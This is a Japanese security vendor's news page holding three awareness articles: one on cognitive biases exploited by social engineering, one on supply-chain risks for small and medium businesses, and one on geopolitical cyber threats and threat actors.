    認知バイアスは人間が判断を行う際に、判断のプロセスを省略し、簡略的な手段で結論を導き出すことが原因で起こります。プログラミング言語でもそうですが、簡略的な手段で得る結果には一定のエラーが混在します。エラーを前提としたフォローアップの行動やエラーを前提とした安全策、対策が用意されていればよいですが、そのままの結果を用いることで大きなミスを生むことがあります。つまり認知バイアスはソーシャルエンジニアリング攻撃に対する脆弱性なのです。

    認知バイアスにはソーシャルエンジニアリングに関連するものに限定しても以下のようなものがあります。

    認知バイアスの種類 概要
    フレーミング効果 情報の提示方法で判断がゆがめられる傾向
    アンカリング効果 最初に提示された情報に強く影響され、その後の判断がゆがめられる傾向
    確認バイアス 自身の信念・期待・希望を支持する情報を優先的に探し、解釈する傾向
    自己奉仕バイアス 成功を自身の能力などの内的要因に、失敗を状況など外的要因に帰属させる傾向
    エゴバイアス 特に経営層に見られる、自身の能力を過大評価しリスクを過小評価する傾向

    攻撃者はこのような認知バイアスを悪用して、被害者の思考プロセスや意思決定を操作しようと試みるのです。

    読者の皆さまも、普段から知識を身につけ意識を高めるために本記事を読まれているかと存じますが、残念ながら意識や一般的な技術知識のみでは必ずしも脆弱性を減少させない可能性があるともいわれています。これは実際には知識が不足しているケースが含まれるということもありますが、何よりも効果的な対策は無意識のレベルで安全な行動が習慣となっている必要があるとされているためです。

    心理的側面に関連する脆弱性

    認知機能に関連する脆弱性を踏まえたうえで、心理的側面からみた脆弱性をみてみましょう。

    説得

    • 被害者を攻撃者の意図通りに行動させるための手段で ソーシャルエンジニアリングの核心的な概念ともいえます
    • 権威性、信憑性しんぴょうせい、メッセージの質やアピール(文脈化、パーソナライゼーション、視覚的欺瞞ぎまん)によって被害者が説得されてしまうものです
    • なんらかの権限を持つ人や著名な企業に成りすますことで説得できることがわかっています

    信頼と欺瞞

    • 攻撃者は対面ではなくオンライン環境であることを踏まえたうえで、オンライン環境におけるユーザーの信頼レベルを悪用します
    • 攻撃者は親しい人物や評判の高い人物を装うなどして信頼を築こうとします

    感情

    • 感情は行動変化に強い影響を与えるため、ソーシャルエンジニアリング攻撃で頻繁に悪用されます
    • 不安感をあおったり、切迫感を演出したりすることで認知機能を低下させて攻撃の成功確率を高める場合、好奇心をあおることで秘密情報を聞き出す場合などがあります

    態度と行動

    • 計画行動理論のような人間の行動を予測する心理学モデルの要素が悪用されうる側面を刺します
    • 個人の性格特性、リスク認識、自己効力感、オンライン習慣がセキュリティ行動や攻撃に対する感受性に関連する可能性があるとされています

    リスク認識と疑念

    • オンライン脅威に対するリスク認識が高いほど脆弱性が低下する可能性があります
    • 説得の兆候を検出する能力や疑念を持つ姿勢が必ずしも被害を防げない場合もあります

    属性に関連する脆弱性

    以下の2属性は、比較的他の要因との組み合わせで脆弱性に影響を与える可能性があるとされています。

    1. 年齢
    2. 文化


    ―第2回「実例で解説!フィッシングメールの手口と対策」へ続く―

    【連載一覧】

    ―第2回「実例で解説!フィッシングメールの手口と対策」―
    ―第3回「Non-Human Identities Top 10とは?自動化時代に求められる新しいセキュリティ視点」―
    ―第4回「企業が行うべきフィッシング対策」」―

    【関連記事】
    【重要】楽天証券・SBI 証券をかたるフィッシングメールにご注意!
    IPA 情報セキュリティ10大脅威からみる―注目が高まる犯罪のビジネス化―
    フィッシングとは?巧妙化する手口とその対策
    「情報セキュリティ 10 大脅威」3 年連続ベスト 3 入り、ビジネスメール詐欺を防ぐ手立ては?

    【参考情報】

  • Rosana Montanez, Edward Golob,Shouhuai Xu (2022),”Human Cognition Through the Lens of Social Engineering Cyberattacks”,2025年6月5日閲覧, https://www.frontiersin.org/journals/psychology/articles/10.3389/fpsyg.2020.01755/full
  • Murtaza Ahmed Siddiqi,Wooguil Pak, Moquddam A. Siddiqi(2022),”A Study on the Psychology of Social Engineering-Based Cyberattacks and Existing Countermeasures”,2025年6月5日閲覧, https://www.mdpi.com/2076-3417/12/12/6042
  • Udochukwu Godswill David, Ayomide Bode-Asa (2023),”An Overview of Social Engineering: The Role of Cognitive Biases Towards Social Engineering-Based Cyber-Attacks, Impacts and Countermeasures”,2025年6月5日閲覧, https://www.researchgate.net/publication/376450802_An_Overview_of_Social_Engineering_The_Role_of_Cognitive_Biases_Towards_Social_Engineering-Based_Cyber-Attacks_Impacts_and_Countermeasures
  • Martin Lee, Cisco Talos Blog: The IT help desk kindly requests you read this newsletter, May 8, 2025
  • Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年6月25日(水)13:00~14:00
    リモートワークの落とし穴を塞ぐ!セキュリティ情報の効率的な収集法&対策のポイント
  • 2025年7月2日(水)13:00~14:00
    いまWeb担当者が知るべきプライバシー対応と情報セキュリティ-プライバシー保護規制と進化するサイバー攻撃手法への対応-
  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像

    “攻撃者の格好の標的”から外す!中小企業のサイバーセキュリティ-中小企業が狙われるサプライチェーン攻撃とサイバーセキュリティ強化術-

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    中小企業はサイバー攻撃者の格好の標的とされることも多く、特にサプライチェーン攻撃で狙われるリスクが高まっています。そこで、自組織におけるリスクの可視化やセキュリティ対策の定期的な見直しをすることが重要です。本記事では中小企業のサイバーセキュリティの現状やそれによって起こり得る影響、サプライチェーン攻撃の事例を踏まえ、効果的なセキュリティ対策と見直しのポイントを解説します。

    ペネトレーションテストの有効性やシナリオ解説をまとめたホワイトペーパーを公開中!以下のリンクから無料でダウンロードいただけます。
    記事はこちら

    中小企業のサイバーセキュリティの現状

    昨今、中小企業のサイバーセキュリティ対策に注目が集まっています。中でも、大手企業が取引先に求める安全性が、サプライチェーン全体へと波及し、サプライチェーン攻撃が大きな問題となっています。その要因には、日本の企業の約9割が中小企業であり*2、大企業の関連会社、取引先企業を含め多くを中小企業が占めているという点が挙げられます。

    認識と実態のギャップ

    日本商工会議所の調査では、「十分に対策している」「ある程度対策している」と回答した企業は86%と高い水準で、回答した企業のほとんどが「自社は対策している」と考えているようです。しかし、実際に行われているセキュリティ対策の内訳をみると、「ウイルス対策ソフト」(90.1%)、「ソフトウェアの定期的なアップデート」(72.6%)が中心で、「社内教育」、「セキュリティ診断」、「訓練」などといった専門的な対策については、いずれも30%以下にとどまっています。本来であれば十分な対策をしていると言えるのは、専門的な対策まで実施して言えるものです。この認識と実態のギャップが、サプライチェーン全体の脆弱性を生み、取引先への被害連鎖を招くリスクを高めています。

    認識と実態のギャップ
    出典:日本商工会議所「サイバー安全保障分野での対応能力の向上に向けた有識者会議」ヒアリング資料(資料3)

    ここまで中小企業のサイバーセキュリティの現状と対策の実施状況についてご紹介しました。では、サイバー攻撃の標的となった場合、中小企業に与える影響とはどのようなことがあるのでしょうか。

    サイバー攻撃が中小企業に与える影響

    中小企業のサイバーセキュリティ対策が不十分だと、自社だけでなくサプライチェーン全体に深刻な影響が及びます。IPA(独立行政法人情報処理推進機構)「2024年度中小企業等実態調査結果」(速報版/2025年2月公開)によれば、調査対象の中小企業の約70%が「自社のサイバーインシデントが取引先事業に影響を与えた」と回答しています。自社だけでなくサプライチェーン全体を見据えた取り組みをしないと、連鎖的に被害が拡大し、取引先企業の業務停止や企業の信用失墜、最悪の場合は損害賠償請求にまで発展するケースも少なくありません。

    サプライチェーンで狙われる中小企業

    セキュリティ対策が手薄な関連企業や取引先企業を経由して、標的とする企業へ不正侵入をする「サプライチェーン攻撃」が急増しています。IPA「情報セキュリティ10大脅威 2025(組織編)」でも「サプライチェーンや委託先を狙った攻撃」が2位にランクインしています。

    サプライチェーン上には攻撃者にとって魅了的な、機密情報、知的財産、顧客データなどが流れ、中小企業が格好の標的になりがちです。中小企業が狙われる要因として、攻撃者の最終的なターゲットとなりうる大手企業とつながりがあることや、予算や人材不足などの制約によってセキュリティ対策が不十分になりがちなことなどが挙げられます。

    サプライチェーン管理で陥りがちな落とし穴

    サプライチェーンでは、以下のような課題が連鎖的な脆弱性を生み出します。

    • リモートワーク環境下などで委託先のセキュリティ状況が可視化できず、実態が把握できない
    • セキュリティ基準や管理体制が統一されず、企業間で対策レベルに大きな格差が発生
    • 人材や予算が限られる中小企業では、セキュリティ対策が後回しになりがち

    こうした課題が積み重なると、委託先の一つの企業で発生したインシデントが再委託先まであっという間に波及し、大企業を含むサプライチェーン全体が火だるまとなり得ます。そのため、中小企業のサイバーセキュリティ対策には、関係先を含めた統一ルールと継続的な情報共有が不可欠です。

    サプライチェーン攻撃の事例

    2023年11月27日、メッセージアプリ提供会社が、自社サーバへの不正アクセスでメッセージアプリに関するユーザ情報・取引先情報、従業者情報等が漏洩したことを公表しました。

    発端は、同社と関係会社が共用する委託先業者の従業員PCがマルウェアに感染し、共通認証基盤を経由してメインシステムに侵入されたことです。共通の認証基盤で管理されているシステムへネットワーク接続を許可していたことから、同社のシステムに不正アクセスされました。(下図参照)

    この事例から関係会社との認証基盤の共有や、ネットワークアクセス管理、委託先業者の安全管理など、セキュリティ対策、見直しを行うべきポイントが浮き彫りになり、中小企業でも委託先の安全管理の甘さが同様の被害を招く可能性が示されました。委託先業者の安全管理は委託先業者の責任とせずに、自社のセキュリティの一角と認識して対応することが重要です。

    中小企業のサイバーセキュリティ対策

    中小企業のサイバーセキュリティ強化には、自社だけでなくサプライチェーン全体での取り組みが不可欠です。

    サプライチェーン全体への取り組み

    サプライチェーン全体では、次の3点を定期的に確認しましょう。

    • サプライチェーン上の各企業におけるセキュリティ状況の把握(アンケート調査等の実施)
    • サプライチェーン上にセキュリティ水準の異なる企業があるか確認
    • サプライチェーン上の企業間における重要情報の定義と取り扱い方法の取り決め実施

    ポイントは、常に自社/自組織が当事者であるという姿勢です。以下のような基本的な対応がとられているか、今一度ご確認いただくことをおすすめします。

    自社・自組織での基本的な取り組み

    • 自社/自組織のセキュリティ状況の把握と対策
    • 取引先/委託先のセキュリティ対策状況の監査
    • 使用しているソフトウェアに関する脆弱性情報のキャッチアップ 等

    また、以下のガイドラインもあわせて参照することを推奨します。
    経済産業省 商務情報政策局 サイバーセキュリティ課
    ソフトウェア管理に向けたSBOM(Software Bill of Materials)の導入に関する手引Ver.1.0
    OSS の利活⽤及びそのセキュリティ確保に向けた 管理⼿法に関する事例集

    「SBOM (Software Bill of Materials)」について、SQAT.jpでは以下の記事でご紹介しています。こちらもあわせてご覧ください。
    脆弱性管理とIT資産管理-サイバー攻撃から組織を守る取り組み-

    まとめ:今すぐ自組織のセキュリティ対策の見直しを!

    中小企業のサイバーセキュリティ強化は、自社だけでなく取引先や委託先を含むサプライチェーン全体での取り組みが欠かせません。まずは以下のステップを実践して被害のリスクを最小化しましょう。

    1. 現状把握:年1回以上の脆弱性診断やペネトレーションテストで、自社システムのリスクを可視化
    2. サプライチェーン調査:アンケートや監査で取引先のセキュリティ水準を確認・格差を是正
    3. 自社・自組織のルールの策定:重要情報の定義と取り扱い方法を取引先と合意・文書化
    4. 外部の専門家活用:ガイドラインを参照し、第三者レビューで対策の網羅性を担保
    5. 継続的な見直し:四半期ごとに状況を更新し、セキュリティ運用を見直す

    サプライチェーン関連記事はSQAT.jpで公開中!こちらからご覧ください。
    サプライチェーンとは-サプライチェーン攻撃の脅威と対策1-
    事例から学ぶサプライチェーン攻撃-サプライチェーン攻撃の脅威と対策2-
    サプライチェーン攻撃への対策 -サプライチェーン攻撃の脅威と対策3-

    過去のウェビナー再配信に関するお問い合わせはこちら

    セキュリティ対策は専門家に相談を

    サイバー攻撃手法は日々更新されており、どんなにセキュリティ対策を実施していても自組織のみではインシデントの発生を防ぎきれないのが実情です。自システムのリスク状況の把握には、脆弱性診断の実施がおすすめです。また、サイバー攻撃への備えとして、セキュリティ対策の有効性の確認には信頼できる第三者機関の活用をおすすめします。

    脆弱性診断

    脆弱性診断のより詳しい診断手法や実践ポイントをまとめたホワイトペーパーを公開中!以下のリンクから無料でダウンロードいただけます。
    記事はこちら

    脆弱性とは…
    ・外部からアクセスできる箇所に攻撃の起点として悪用され得る脆弱性や設定の不備が存在しないかどうかを確認することも重要。その際に有効なのが「脆弱性診断」
    ・攻撃者はシステムの脆弱性を突いて侵入を試みるため、診断によって脆弱な領域を洗い出し、優先度に応じた対策を講じる。診断は、定期的に実施するだけでなく、システム更改時にも必ず実施することが推奨される。
    【参考記事】
    拡大・高度化する標的型攻撃に有効な対策とは―2020年夏版
    「侵入」「侵入後」の対策の確認方法

    Webアプリケーション脆弱性診断バナー

    ペネトレーションテスト

    ペネトレーションテストの有効性やシナリオ解説をまとめたホワイトペーパーを公開中!以下のリンクから無料でダウンロードいただけます。
    記事はこちら

    ペネトレーションテストとは…
    ・ペネトレーションテストとは、脆弱性診断の結果、見つかった脆弱性を悪用して、システム・ネットワークへの不正侵入や攻撃が本当に成功するのかを検証することができるテスト手法のひとつ
    ・重要インフラ15分野では、内部監査と並んで情報セキュリティ確保のための取り組みとして例示されている。

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年6月18日(水)14:00~15:00
    侵入が防げない時代に選ぶべき脆弱性診断サービスとは?~実績・サポート・診断基準で比較する、最適な脆弱性診断の選び方~
  • 2025年6月25日(水)13:00~14:00
    リモートワークの落とし穴を塞ぐ!セキュリティ情報の効率的な収集法&対策のポイント
  • 2025年7月16日(水)14:00~15:00
    進化するランサムウェア攻撃-国内最新事例から学ぶ!被害を防ぐ実践ポイント10項目を解説-
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像

    10 分では伝えきれなかった地政学リスク

    Share

    Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    本記事は2025年6月11日開催のウェビナー「DDoS攻撃から守る!大規模イベント時のセキュリティ -大規模イベント開催中に急増するDDoS攻撃の事例と防御策を解説-」のオープニングセッション「10分でわかる地政学リスク」のフォローアップコンテンツです。

    本ウェビナーの再配信予定にご関心のある方はこちらからお問い合わせください。

    次回のウェビナー開催情報はこちら

    はじめに

    下図は2025年5月下旬時点での主要な地政学リスクをあらわした世界地図です。

    大きく分けると以下のように分類できるでしょう。

    北朝鮮関連の問題

    • 核ミサイル問題が原因となっている経済制裁と、経済制裁下で資金を調達するためのサイバー攻撃の実行
    • ロシアへのサイバー攻撃・物理的攻撃手段およびリソースの提供

    中国関連の問題

    • 海洋進出問題やアメリカとの対立など

    ロシア関連の問題

    • ウクライナへの侵攻
    • 対ヨーロッパへの干渉
      東欧各国の選挙妨害
      ヨーロッパに対するハイブリッド脅威

    地域的な対立

    • インド・パキスタンのカシミール紛争
    • 中東地域全体の不安定化
    • アフリカ地域の政情不安

    アメリカと近隣各国の摩擦

    この中で日本は北朝鮮・中国・ロシアと隣接しているという地理的要因を有しており、これが地政学リスクとなっています。

    ハイブリッド脅威とは
    ハイブリッド脅威とはハイブリッド戦争の一段階手前、武力攻撃と見なされない範囲で行われる多様な手段を組み合わせた脅威、もう少し簡単に言い表すと「戦争未満」の状態を指します。ヨーロッパに対するロシアのハイブリッド脅威では、以下のような複合的な作戦による脅威が形成されています。
    ・海底ケーブルの切断
    ・航空用GPS信号妨害
    ・メディアを通じたプロパガンダ活動
    ・DDoSから重要インフラへの攻撃まで、幅広いサイバー攻撃

    地政学リスクと国際法

    地政学リスクを背景としたサイバー攻撃は国境を越えて発生します。サイバー空間での窃盗や詐欺については、デジタル空間での匿名性や証拠の収集の限界、犯行地や犯行主体が海外に存在するといった場合の法執行上の制約があります。サイバー犯罪に関しては「サイバー犯罪に関する条約(ブダペスト条約)」がありますが、加盟国は限定的であり、今回地政学リスクの震源地に挙げた多くの国が非加盟国となります。このため、地政学的対立を背景とするサイバー犯罪・サイバー脅威については起訴に至っても、実際の身柄引き渡しや裁判の実行が不可能となるケースが多くあります。

    このように個別の犯罪行為については一定の国際的枠組みがありますが、より広範なサイバー脅威については、タリンマニュアルというNATO(北大西洋条約機構)の専門機関が作成した、サイバー攻撃に関する国際法の適用について研究成果をまとめた文書があります。タリンマニュアル2.0(2017年公開)ではサイバー戦争(武力攻撃レベル)に加えて、サイバー戦争未満(武力攻撃レベル未満だが悪意があるサイバー行動)であるサイバー脅威も対象とすべきとされました。しかし、残念ながらタリンマニュアルは拘束力を持たない研究成果という位置づけの文書となっており、また、サイバー脅威についても具体的な拘束力を持った国際条約も存在しません。仮にサイバー戦争が発生した場合には、既存の国際戦争法の体系で対処することになるでしょう。2025年5月現在、タリンマニュアル3.0が2021年から5か年計画で作成されていますが、近年のサイバー脅威の急激な変化や、国際情勢の変化もあるため、従来同様に国際社会に受け入れられるのか、またサイバー脅威やサイバー空間一般に関する国際的な取り組みが実施されるのかは、非常に不透明な状況です。

    脅威アクター

    脅威アクター(サイバー攻撃を行う主体)というと皆さんはどんなものを想像されますか?ランサムウェアグループ、国家が支援するサイバー攻撃グループ、連想されるものは様々挙げられます。

    現在の脅威アクターは大きく分けると以下のように分けられます。

    国家が関与・支援するサイバー攻撃者

    • 主にスパイ行為や妨害行為をする
    • 国によっては暗号資産窃取などもタスクに入っている場合がある
    • 地域によっては海底ケーブルの切断や航空信号の妨害なども

    サイバー犯罪組織

    • ランサムウェア、マルウェアなどを開発する開発者
    • DDoSや踏み台用のボットネット、C2 用インフラなどの提供者
    • Ransomware-as-a-Service(RaaS),Phishing-as-a-Service(PhaaS),Malware-as-a-Service(MaaS)などのサイバー犯罪のサブスクリプションサービス提供者
    • Initial Access Broker(初期アクセスブローカー、IAB)と呼ばれる、認証情報の販売業者
    • 上記のサービスを組み合わせて利用するアフィリエイトなど

    ランサムウェア攻撃一つでも、現在は開発者、インフラ提供者、RaaS、PhaaS、IABが提供するリソースをアフィリエイトが活用して実行しているケースが多くあります。場合によっては一つ目のランサムウェア攻撃に対してデータ流出の防止を目的に身代金を支払ったのに、別のランサムウェアグループからデータ流出で脅迫されるといったケースなどもみられます。

    一方、国家が支援する脅威アクターはサイバー犯罪組織と関連がないように見えますが、実際はそうした脅威アクターがIABから認証情報を取得したと思われるケースや、踏み台用のボットネットを利用するケースなどもあります。国によっては一体的に運用されている場合や、技術人材の交流がある場合もあります。加えて、国によっては脅威アクターへの人材や活動環境、資金の換金場所を提供する合法的な「表」の組織が存在しています。

    このように、数年前と現在とでは脅威アクターの細分化や連携などが行われているため、一つの手がかりから攻撃の全体像や攻撃に関わる全てのアクターを特定することは非常に困難です。

    あなたの組織が脅威アクターに狙われる可能性

    自組織が脅威アクターに狙われる可能性は、残念ながらゼロではありません。重要インフラではなくても、著名企業でなくても、狙われる可能性はあります。

    可能性として考えられるものは以下のような場合です。

    • IABの持つ認証情報にあなたの組織の、個人情報や認証機構にアクセスできる権限を持った認証情報が入っていた場合
    • Non-Human-Identification(NHI)であればAPIキーなどの露呈がGitHubなどで発生している場合、人に属する認証情報であればフィッシングの被害に知らない間に遭っている場合が該当します。

    いずれにしても気づかないうちに悪用されて、被害に遭ったあとに発覚することが多いことから、権限の割り当てを厳密に行うことや、内部検知の仕組みを実装するといった取り組みが必要となります。

    【ご参考】
    株式会社ブロードバンドセキュリティ
    サイバー防衛体制の強化のための新しいアプローチ「G-MDRTM」を提案
    ~セキュリティ専門の「人材」と「最新テクノロジー」を統合的に提供~

    サプライチェーン攻撃

    企業・組織で多く利用されているオープンソースソフトウェアを狙ったサプライチェーン攻撃で、自社が開発または利用するアプリケーションに、パッケージ経由でマルウェアが仕込まれてしまうケースが該当します。ケースとして考えられるのは以下になります。

    • 開発者が使用しているパッケージと紛らわしい名称のパッケージ(実体はマルウェア)を誤って利用してしまうケース(タイポスクワッティング)
    • アプリケーションが使用する正規のパッケージが悪意のあるコントリビューターによってマルウェアに改悪されるケース
    • アプリケーションが直接使用しているパッケージそのものではなく、そのパッケージが依存している別のパッケージがマルウェアに汚染されているケース

    誤って偽IT労働者を雇用してしまった場合

    直接雇用していない場合でも、業務委託先が誤って雇用したことでマルウェアが仕込まれ、個人情報が漏洩するといった事案が発生することも考えられます。仮に直接雇用した場合、自社がサイバー攻撃の被害に遭う可能性はもちろんのこと、マネーロンダリングへの加担や外国為替及び外国貿易法違反に問われる可能性もあります。

    また、あなた自身(個人)が狙われてしまうこともあり得ます。

    偽の求人に応募した場合

    従業員、もしくは読者の皆様が偽の求人に応募することで、採用プロセスの一環としてその場で至急指定されたコードの実行を要求され、実際に実行した場合にマルウェアに感染してしまうものです。結果として暗号資産をコールドウォレットから引き抜かれる、個人情報(主に認証情報)を窃取される、といった被害を受けるケースがあります。

    マルウェアの感染からサプライチェーン攻撃を引き起こした結果、暗号資産交換所から資金が窃取された事件などがあり、複合的な影響の発生もありえるでしょう。

    関連リンク

  • 情報セキュリティ10大脅威2025-「地政学的リスクに起因するサイバー攻撃」とは?-
  • 【速報版】情報セキュリティ 10 大脅威 2025-脅威と対策を解説
  • 北朝鮮によるソーシャルエンジニアリング攻撃~ソーシャルエンジニアリング攻撃とは?手口と脅威を解説
  • Security NEWS TOPに戻る
    バックナンバー TOPに戻る

    ウェビナー開催のお知らせ

  • 2025年6月18日(水)14:00~15:00
    侵入が防げない時代に選ぶべき脆弱性診断サービスとは?~実績・サポート・診断基準で比較する、最適な脆弱性診断の選び方~
  • 2025年6月25日(水)13:00~14:00
    リモートワークの落とし穴を塞ぐ!セキュリティ情報の効率的な収集法&対策のポイント
  • 最新情報はこちら


    資料ダウンロードボタン
    年二回発行されるセキュリティトレンドの詳細レポート。BBSecで行われた診断の統計データも掲載。

    お問い合わせボタン
    サービスに関する疑問や質問はこちらからお気軽にお問合せください。


    Security Serviceへのリンクバナー画像

    BBsecコーポレートサイトへのリンクバナー画像

    セキュリティ緊急対応のバナー画像